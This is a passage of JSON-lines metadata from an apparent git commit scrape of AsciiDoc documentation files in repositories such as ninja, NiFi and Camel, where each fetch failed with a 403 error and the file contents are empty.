2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","new_file":"_posts\/2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4f2469b51bbd86cae7733e5f645f2d450c6634e","subject":"Fix reference to section of BuildConfig","message":"Fix reference to section of BuildConfig\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"dev_guide\/builds.adoc","new_file":"dev_guide\/builds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8871a391175db325c61b4c62d67feb64246dad1","subject":"Worked on documentation","message":"Worked on documentation\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8e8022636b98aa907ba6656960ea2929dd82e88c","subject":"self-contained dtc tutorial","message":"self-contained dtc tutorial\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/020_tutorial\/120_self-contained-dtc.adoc","new_file":"src\/docs\/020_tutorial\/120_self-contained-dtc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01b9826da32628c6baa7cfcca0e5cf17f47835f1","subject":"Link 8","message":"Link 8\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/EE.adoc","new_file":"Best practices\/EE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3311c32f3e5b405a84af7decfa168f33a250f11b","subject":"Improve the manual documentation","message":"Improve the manual documentation\n","repos":"ilor\/ninja,nico\/ninja,Qix-\/ninja,dabrahams\/ninja,dabrahams\/ninja,vvvrrooomm\/ninja,ninja-build\/ninja,mutac\/ninja,dpwright\/ninja,automeka\/ninja,fuchsia-mirror\/third_party-ninja,metti\/ninja,mutac\/ninja,bradking\/ninja,rjogrady\/ninja,automeka\/ninja,colincross\/ninja,sgraham\/ninja,Maratyszcza\/ninja-pypi,lizh06\/ninja,nafest\/ninja,mydongistiny\/ninja,dorgonman\/ninja,kissthink\/ninja,ctiller\/ninja,metti\/ninja,automeka\/ninja,ctiller\/ninja,maruel\/ninja,kimgr\/ninja,purcell\/ninja,metti\/ninja,synaptek\/ninja,sxlin\/dist_ninja,atetubou\/ninja,autopulated\/ninja,moroten\/ninja,mydongistiny\/ninja,dendy\/ninja,liukd\/ninja,purcell\/ninja,sxlin\/dist_ninja,bmeurer\/ninja,nicolasdespres\/ninja,kimgr\/ninja,nafest\/ninja,mgaunard\/ninja,lizh06\/ninja,moroten\/ninja,dorgonman\/ninja,juntalis\/ninja,rjogrady\/ninja,jsternberg\/ninja,juntalis\/ninja,ikarienator\/ninja,yannicklm\/ninja,pck\/ninja,pathscale\/ninja,TheOneRing\/ninja,sxlin\/dist_ninja,Ju2ender\/ninja,ilor\/ninja,TheOneRing\/ninja,rnk\/ninja,mgaunard\/ninja,dpwright\/ninja,moroten\/ninja,pathscale\/ninja,pathscale\/ninja,sgraham\/ninja,atetubou\/ninja,yannicklm\/ninja,drbo\/ninja,glensc\/ninja,nico\/ninja,nickhutchinson\/ninja,TheOneRing\/ninja,autopulated\/ninja,mdempsky\/ninja,Qix-\/ninja,jendrikillner\/ninja,sgraham\/ninja,guiquanz\/ninja,fuchsia-mirror\/third_party-ninja,mdempsky\/ninja,jimon\/ninja,bmeurer\/ninja,kissthink\/ninja,glensc\/ninja,maruel\/ninja,guiquanz\/ninja,mutac\/ninja,jhanssen\/ninja,hnney\/ninja,yannicklm\/ninja,sorbits\/ninja,sgraham\/ninja,fifoforlifo\/ninja,mdempsky\/ninja,mydongistiny\/ninja,rnk\/ninja,ikarienator\/ninja,guiquanz\/ninja,ndsol\/subninja,syntheticpp\/ninja,guiquanz\/ninja,nicolasdespres\/ninja,Maratyszcza\/ninja-pypi,dpwright\/ninja,nocnokneo\/ninja,ignatenkobrain\/ninja,ThiagoGarciaAlves\/ninja,ninja-build\/ninja,martine\/ninja,ninja-build\/ninja,vvvrrooomm\/ninja,martine\/ninja,nafest\/ninja,ikarienator\/ninja,hnney\/ninja,ignatenkobrain\/ninja,tfarina\/ninja,juntalis\/ninja,metti\/ninja,jimon\/ninja,sorbits\/ninja,autopulated\/ninja,fuchsia-mirror\/third_party-ninja,dendy\/ninja,nafest\/ninja,dendy\/ninja,AoD314\/ninja,dorgonman\/ninja,iwadon\/ninja,bradking\/ninja,Qix-\/ninja,jhanssen\/ninja,jsternberg\/ninja,nocnokneo\/ninja,sxlin\/dist_ninja,fifoforlifo\/ninja,colincross\/ninja,mohamed\/ninja,iwadon\/ninja,glensc\/ninja,pck\/ninja,atetubou\/ninja,rjogrady\/ninja,bmeurer\/ninja,moroten\/ninja,jhanssen\/ninja,hnney\/ninja,tfarina\/ninja,mdempsky\/ninja,fifoforlifo\/ninja,nocnokneo\/ninja,sxlin\/dist_ninja,kissthink\/ninja,lizh06\/ninja,Qix-\/ninja,fifoforlifo\/ninja,hnney\/ninja,glensc\/ninja,jimon\/ninja,dorgonman\/ninja,liukd\/ninja,iwadon\/ninja,syntheticpp\/ninja,jhanssen\/ninja,yannicklm\/ninja,Maratyszcza\/ninja-pypi,nico\/ninja,nickhutchinson\/ninja,mohamed\/ninja,sorbits\/ninja,ctiller\/ninja,colincross\/ninja,ndsol\/subninja,sorbits\/ninja,ctiller\/ninja,vvvrrooomm\/ninja,ThiagoGarciaAlves\/ninja,syntheticpp\/ninja,colincross\/ninja,drbo\/ninja,iwadon\/ninja,Maratyszcza\/ninja-pypi,AoD314\/ninja,liukd\/ninja,fuchsia-mirror\/third_party-ninja,martine\/ninja,ignatenkobrain\/ninja,tfarina\/ninja,dendy\/ninja,dpwright\/ninja,rnk\/ninja,nico\/ninja,AoD314\/ninja,kimgr\/ninja,AoD314\/ninja,mgaunard\/ninja,purcell\/ninja,ignatenkobrain\/ninja,maruel\/ninja,ThiagoGarciaAlves\/ninja,ilor\/ninja,ndsol\/subninja,kissthink\/ninja,pck\/ninja,nicolasdespres\/ninja,ninja-build\/ninja,nicolasdespres\/ninja,sxlin\/dist_ninja,dabrahams\/ninja,jsternberg\/ninja,juntalis\/ninja,lizh06\/ninja,jsternberg\/ninja,sxlin\/dist_ninja,mydongistiny\/ninja,martine\/ninja,pathscale\/ninja,rnk\/ninja,nocnokneo\/ninja,jendrikillner\/ninja,purcell\/ninja,maruel\/ninja,dabrahams\/ninja,pck\/ninja,automeka\/ninja,ThiagoGarciaAlves\/ninja,nickhutchinson\/ninja,Ju2ender\/ninja,synaptek\/ninja,jendrikillner\/ninja,mohamed\/ninja,mutac\/ninja,mohamed\/ninja,kimgr\/ninja,syntheticpp\/ninja,jimon\/ninja,bradking\/ninja,ilor\/ninja,ikarienator\/ninja,drbo\/ninja,synaptek\/ninja,liukd\/ninja,bmeurer\/ninja,vvvrrooomm\/ninja,Ju2ender\/ninja,atetubou\/ninja,bradking\/ninja,synaptek\/ninja,ndsol\/subninja,tfarina\/ninja,TheOneRing\/ninja,autopulated\/ninja,nickhutchinson\/ninja,drbo\/ninja,rjogrady\/ninja,mgaunard\/ninja,jendrikillner\/ninja,Ju2ender\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lizh06\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d917f83c4538831550da19ee9c3b31885077963","subject":"y2b create post This Might Give You Faster Internet","message":"y2b create post This Might Give You Faster Internet","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-24-This-Might-Give-You-Faster-Internet.adoc","new_file":"_posts\/2016-06-24-This-Might-Give-You-Faster-Internet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6ad9c765dc05878066d8fbc8f395c83a1e0fc10","subject":"Publish 2016-6-27-PHP.adoc","message":"Publish 2016-6-27-PHP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHP.adoc","new_file":"2016-6-27-PHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f20881620ba777c30567c49f7dd34763478ac1b","subject":"Renamed '_posts\/2017-01-25-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc' to '_posts\/2017-01-25-Draft-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc'","message":"Renamed '_posts\/2017-01-25-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc' to '_posts\/2017-01-25-Draft-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc'","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-01-25-Draft-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc","new_file":"_posts\/2017-01-25-Draft-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34d26078cda8c8cf36a1685cdf72e16b488927c6","subject":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","message":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa9455f9506ce89d9d0748019e7fd4b8c4b1c68a","subject":"Update 2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","message":"Update 2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","new_file":"_posts\/2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d5b2203792f1760f3ec7d2ef2f3f6610cfc3641","subject":"document ECMWF GRIB-1 extended complex packing","message":"document ECMWF GRIB-1 extended complex packing\n","repos":"Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java","old_file":"docs\/website\/netcdf-java\/reference\/formats\/Grib1Notes.adoc","new_file":"docs\/website\/netcdf-java\/reference\/formats\/Grib1Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Unidata\/netcdf-java.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"988cd027e9cfa4ed4a90a3de07435e3b90a1a219","subject":"Update 2015-03-16-LGBTQ-in-tech.adoc","message":"Update 2015-03-16-LGBTQ-in-tech.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-03-16-LGBTQ-in-tech.adoc","new_file":"_posts\/2015-03-16-LGBTQ-in-tech.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8f4223ca449585c115251ee7969d268e6a1eca3","subject":"Update 2015-06-08-A-remplacer-1.adoc","message":"Update 2015-06-08-A-remplacer-1.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-08-A-remplacer-1.adoc","new_file":"_posts\/2015-06-08-A-remplacer-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"357c6d76b96efa832949c5207e4eaa9a4dddc656","subject":"y2b create post Ultimate Gaming PC Project Episode #2","message":"y2b create post Ultimate Gaming PC Project Episode #2","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-07-16-Ultimate-Gaming-PC-Project-Episode-2.adoc","new_file":"_posts\/2012-07-16-Ultimate-Gaming-PC-Project-Episode-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acabe5ffcb0d47752d151b91cf90fa0337cf746b","subject":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","message":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68b7ad78ccb8ee6cd6cad5218fbbd13438085f5f","subject":"NIFI-218: Started Expression Language guide","message":"NIFI-218: Started Expression Language guide\n","repos":"jtstorck\/nifi,jskora\/nifi,speddy93\/nifi,peter-gergely-horvath\/nifi,InspurUSA\/nifi,qfdk\/nifi,jfrazee\/nifi,aperepel\/nifi,apsaltis\/nifi,thesolson\/nifi,m-hogue\/nifi,WilliamNouet\/ApacheNiFi,speddy93\/nifi,josephxsxn\/nifi,jjmeyer0\/nifi,thesolson\/nifi,josephxsxn\/nifi,zhengsg\/nifi,PuspenduBanerjee\/nifi,pvillard31\/nifi,apsaltis\/nifi,alopresto\/nifi,WilliamNouet\/nifi,zhengsg\/nifi,thesolson\/nifi,tequalsme\/nifi,zhengsg\/nifi,jfrazee\/nifi,YolandaMDavis\/nifi,MikeThomsen\/nifi,mans2singh\/nifi,mcgilman\/nifi,tequalsme\/nifi,InspurUSA\/nifi,josephxsxn\/nifi,mcgilman\/nifi,ShellyLC\/nifi,trixpan\/nifi,josephxsxn\/nifi,ShellyLC\/nifi,michalklempa\/nifi,alopresto\/nifi,qfdk\/nifi,jfrazee\/nifi,peter-gergely-horvath\/nifi,joewitt\/incubator-nifi,PuspenduBanerjee\/nifi,MikeThomsen\/nifi,InspurUSA\/nifi,jfrazee\/nifi,dlukyanov\/nifi,alopresto\/nifi,ShellyLC\/nifi,aperepel\/nifi,WilliamNouet\/nifi,josephxsxn\/nifi,qfdk\/nifi,jjmeyer0\/nifi,bbende\/nifi,thesolson\/nifi,MikeThomsen\/nifi,pvillard31\/nifi,mattyb149\/nifi,mcgilman\/nifi,joewitt\/incubator-nifi,Xsixteen\/nifi,m-hogue\/nifi,jjmeyer0\/nifi,Wesley-Lawrence\/nifi,mattyb149\/nifi,apsaltis\/nifi,InspurUSA\/nifi,jtstorck\/nifi,peter-gergely-horvath\/nifi,speddy93\/nifi,m-hogue\/nifi,michalklempa\/nifi,mans2singh\/nifi,zhengsg\/nifi,tijoparacka\/nifi,MikeThomsen\/nifi,peter-gergely-horvath\/nifi,michalklempa\/nifi,Xsixteen\/nifi,jtstorck\/nifi,tequalsme\/nifi,jskora\/nifi,tijoparacka\/nifi,trixpan\/nifi,Wesley-Lawrence\/nifi,mcgilman\/nifi,aperepel\/nifi,PuspenduBanerjee\/nifi,dlukyanov\/nifi,mans2singh\/nifi,jjmeyer0\/nifi,mcgilman\/nifi,joewitt\/incubator-nifi,mans2singh\/nifi,trixpan\/nifi,WilliamNouet\/nifi,mattyb149\/nifi,YolandaMDavis\/nifi,m-hogue\/nifi,aperepel\/nifi,jtstorck\/nifi,jjmeyer0\/nifi,mans2singh\/nifi,zhengsg\/nifi,tijoparacka\/nifi,ijokarumawak\/nifi,pvillard31\/nifi,m-hogue\/nifi,PuspenduBanerjee\/nifi,mattyb149\/nifi,joetrite\/nifi,pvillard31\/nifi,InspurUSA\/nifi,ijokarumawak\/nifi,tijoparacka\/nifi,michalklempa\/nifi,apsaltis\/nifi,joewitt\/incubator-nifi,patricker\/nifi,dlukyanov\/nifi,m-hogue\/nifi,tequalsme\/nifi,pvillard31\/nifi,YolandaMDavis\/nifi,PuspenduBanerjee\/nifi,pvillard31\/nifi,jtstorck\/nifi,ijokarumawak\/nifi,joetrite\/nifi,trixpan\/nifi,patricker\/nifi,PuspenduBanerjee\/nifi,mcgilman\/nifi,michalklempa\/nifi,MikeThomsen\/nifi,aperepel\/nifi,jskora\/nifi,Wesley-Lawrence\/nifi,MikeThomsen\/nifi,jfrazee\/nifi,MikeThomsen\/nifi,qfdk\/nifi,mans2singh\/nifi,jskora\/nifi,dlukyanov\/nifi,mcgilman\/nifi,jtstorck\/nifi,jfrazee\/nifi,speddy93\/nifi,WilliamNouet\/nifi,WilliamNouet\/ApacheNiFi,Xsixteen\/nifi,pvillard31\/nifi,bbende\/nifi,joetrite\/nifi,qfdk\/nifi,bbende\/nifi,speddy93\/nifi,michalklempa\/nifi,tijoparacka\/nifi,ijokarumawak\/nifi,speddy93\/nifi,joetrite\/nifi,jfrazee\/nifi,jfrazee\/nifi,WilliamNouet\/nifi,patricker\/nifi,peter-gergely-horvath\/nifi,tequalsme\/nifi,alopresto\/nifi,joetrite\/nifi,apsaltis\/nifi,dlukyanov\/nifi,Xsixteen\/nifi,patricker\/nifi,jtstorck\/nifi,Wesley-Lawrence\/nifi,WilliamNouet\/ApacheNiFi,alopresto\/nifi,thesolson\/nifi,joewitt\/incubator-nifi,ShellyLC\/nifi,alopresto\/nifi,joewitt\/incubator-nifi,jjmeyer0\/nifi,apsaltis\/nifi,josephxsxn\/nifi,m-hogue\/nifi,ShellyLC\/nifi,Wesley-Lawrence\/nifi,YolandaMDavis\/nifi,peter-gergely-horvath\/nifi,ijokarumawak\/nifi,jskora\/nifi,YolandaMDavis\/nifi,alopresto\/nifi,bbende\/nifi,bbende\/nifi,trixpan\/nifi,pvillard31\/nifi,patricker\/nifi,WilliamNouet\/ApacheNiFi,aperepel\/nifi,ShellyLC\/nifi,jskora\/nifi,InspurUSA\/nifi,dlukyanov\/nifi,ijokarumawak\/nifi,patricker\/nifi,WilliamNouet\/ApacheNiFi,WilliamNouet\/ApacheNiFi,tequalsme\/nifi,zhengsg\/nifi,Xsixteen\/nifi,YolandaMDavis\/nifi,Wesley-Lawrence\/nifi,bbende\/nifi,thesolson\/nifi,qfdk\/nifi,mattyb149\/nifi,tijoparacka\/nifi,YolandaMDavis\/nifi,trixpan\/nifi,WilliamNouet\/nifi,Xsixteen\/nifi,patricker\/nifi,mattyb149\/nifi,joetrite\/nifi,mattyb149\/nifi","old_file":"nifi-docs\/src\/main\/asciidoc\/expression-language-guide.adoc","new_file":"nifi-docs\/src\/main\/asciidoc\/expression-language-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YolandaMDavis\/nifi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"42f093a0e3a8939c0937c75f63861b988551ee9b","subject":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","message":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ed1b7bffdd73cbdc01543d15d4622c4df012e43","subject":"Deleted _posts\/2016-04-03-Les-causes-de-letat-limite-borderline.adoc","message":"Deleted _posts\/2016-04-03-Les-causes-de-letat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-Les-causes-de-letat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-Les-causes-de-letat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4146eeaf9795e5cceb0521717a7a56f0b3d73508","subject":"Update 2016-11-28-An-Introduction-of-Finagle-by-example.adoc","message":"Update 2016-11-28-An-Introduction-of-Finagle-by-example.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-11-28-An-Introduction-of-Finagle-by-example.adoc","new_file":"_posts\/2016-11-28-An-Introduction-of-Finagle-by-example.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83e97655cc34ef848e8cc352af157396dec807da","subject":"CAMEL-10447 Added Transformer adoc","message":"CAMEL-10447 Added Transformer adoc\n","repos":"dmvolod\/camel,nboukhed\/camel,alvinkwekel\/camel,christophd\/camel,gnodet\/camel,anton-k11\/camel,pkletsko\/camel,mgyongyosi\/camel,anoordover\/camel,objectiser\/camel,isavin\/camel,acartapanis\/camel,mgyongyosi\/camel,apache\/camel,jkorab\/camel,nikhilvibhav\/camel,anton-k11\/camel,zregvart\/camel,CodeSmell\/camel,yuruki\/camel,jonmcewen\/camel,dmvolod\/camel,drsquidop\/camel,pkletsko\/camel,bhaveshdt\/camel,lburgazzoli\/camel,ssharma\/camel,allancth\/camel,tadayosi\/camel,chirino\/camel,lburgazzoli\/camel,bgaudaen\/camel,sverkera\/camel,kevinearls\/camel,objectiser\/camel,veithen\/camel,gilfernandes\/camel,rmarting\/camel,nboukhed\/camel,gilfernandes\/camel,jonmcewen\/camel,pkletsko\/camel,driseley\/camel,Fabryprog\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,tlehoux\/camel,rmarting\/camel,lburgazzoli\/apache-camel,nboukhed\/camel,adessaigne\/camel,cunningt\/camel,scranton\/camel,adessaigne\/camel,anton-k11\/camel,CodeSmell\/camel,ssharma\/camel,tlehoux\/camel,w4tson\/camel,kevinearls\/camel,hqstevenson\/camel,cunningt\/camel,isavin\/camel,hqstevenson\/camel,nboukhed\/camel,ullgren\/camel,onders86\/camel,veithen\/camel,tadayosi\/camel,dmvolod\/camel,mgyongyosi\/camel,kevinearls\/camel,DariusX\/camel,mgyongyosi\/camel,Thopap\/camel,cunningt\/camel,gilfernandes\/camel,pax95\/camel,gautric\/camel,lburgazzoli\/camel,mgyongyosi\/camel,yuruki\/camel,NickCis\/camel,sverkera\/camel,lburgazzoli\/apache-camel,onders86\/camel,sverkera\/camel,sabre1041\/camel,driseley\/camel,sirlatrom\/camel,akhettar\/camel,hqstevenson\/camel,adessaigne\/camel,gautric\/camel,alvinkwekel\/camel,prashant2402\/camel,onders86\/camel,Thopap\/camel,driseley\/camel,zregvart\/camel,tkopczynski\/camel,jkorab\/camel,anoordover\/camel,cunningt\/camel,DariusX\/camel,gautric\/camel,zregvart\/camel,allancth\/camel,rmarting\/camel,prashant2402\/camel,jonmcewen\/camel,tlehoux\/camel,christophd\/camel,hqstevenson\/camel,acartapanis\/camel,bgaudaen\/camel,objectiser\/camel,sabre1041\/camel,pax95\/camel,pkletsko\/camel,jonmcewen\/camel,jamesnetherton\/camel,sirlatrom\/camel,tdiesler\/camel,gautric\/camel,tkopczynski\/camel,prashant2402\/camel,isavin\/camel,tdiesler\/camel,allancth\/camel,scranton\/camel,apache\/camel,kevinearls\/camel,punkhorn\/camel-upstream,drsquidop\/camel,tkopczynski\/camel,curso007\/camel,gilfernandes\/camel,adessaigne\/camel,w4tson\/camel,rmarting\/camel,ullgren\/camel,Thopap\/camel,chirino\/camel,prashant2402\/camel,bgaudaen\/camel,lburgazzoli\/apache-camel,gautric\/camel,drsquidop\/camel,punkhorn\/camel-upstream,isavin\/camel,tlehoux\/camel,lburgazzoli\/apache-camel,veithen\/camel,scranton\/camel,akhettar\/camel,davidkarlsen\/camel,RohanHart\/camel,mcollovati\/camel,pmoerenhout\/camel,sverkera\/camel,jonmcewen\/camel,yuruki\/camel,salikjan\/camel,jonmcewen\/camel,ullgren\/camel,tdiesler\/camel,kevinearls\/camel,Thopap\/camel,zregvart\/camel,yuruki\/camel,dmvolod\/camel,chirino\/camel,tdiesler\/camel,sabre1041\/camel,jamesnetherton\/camel,w4tson\/camel,christophd\/camel,acartapanis\/camel,nicolaferraro\/camel,chirino\/camel,davidkarlsen\/camel,driseley\/camel,driseley\/camel,sabre1041\/camel,RohanHart\/camel,tadayosi\/camel,scranton\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,snurmine\/camel,DariusX\/camel,Fabryprog\/camel,jkorab\/camel,bhaveshdt\/camel,sirlatrom\/camel,pax95\/camel,prashant2402\/camel,NickCis\/camel,mcollovati\/camel,isavin\/camel,ullgren\/camel,dmvolod\/camel,sverkera\/camel,gnodet\/camel,RohanHart\/camel,chirino\/camel,akhettar\/camel,tdiesler\/camel,rmarting\/camel,cunningt\/camel,lburgazzoli\/camel,nicolaferraro\/camel,tlehoux\/camel,bgaudaen\/camel,scranton\/camel,jamesnetherton\/camel,mgyongyosi\/camel,dmvolod\/camel,mcollovati\/camel,adessaigne\/camel,NickCis\/camel,hqstevenson\/camel,yuruki\/camel,bgaudaen\/camel,driseley\/camel,anoordover\/camel,Thopap\/camel,alvinkwekel\/camel,snurmine\/camel,CodeSmell\/camel,snurmine\/camel,tkopczynski\/camel,punkhorn\/camel-upstream,isavin\/camel,christophd\/camel,onders86\/camel,nikhilvibhav\/camel,curso007\/camel,snurmine\/camel,onders86\/camel,alvinkwekel\/camel,anoordover\/camel,pmoerenhout\/camel,veithen\/camel,DariusX\/camel,pax95\/camel,bhaveshdt\/camel,gilfernandes\/camel,w4tson\/camel,lburgazzoli\/apache-camel,lburgazzoli\/camel,NickCis\/camel,kevinearls\/camel,nicolaferraro\/camel,pmoerenhout\/camel,mcollovati\/camel,w4tson\/camel,tadayosi\/camel,curso007\/camel,christophd\/camel,acartapanis\/camel,allancth\/camel,lburgazzoli\/camel,sabre1041\/camel,davidkarlsen\/camel,tkopczynski\/camel,curso007\/camel,anton-k11\/camel,nboukhed\/camel,tkopczynski\/camel,RohanHart\/camel,hqstevenson\/camel,tlehoux\/camel,nicolaferraro\/camel,drsquidop\/camel,ssharma\/camel,bhaveshdt\/camel,allancth\/camel,drsquidop\/camel,veithen\/camel,allancth\/camel,sirlatrom\/camel,drsquidop\/camel,chirino\/camel,scranton\/camel,gnodet\/camel,pax95\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,RohanHart\/camel,ssharma\/camel,akhettar\/camel,tadayosi\/camel,salikjan\/camel,akhettar\/camel,C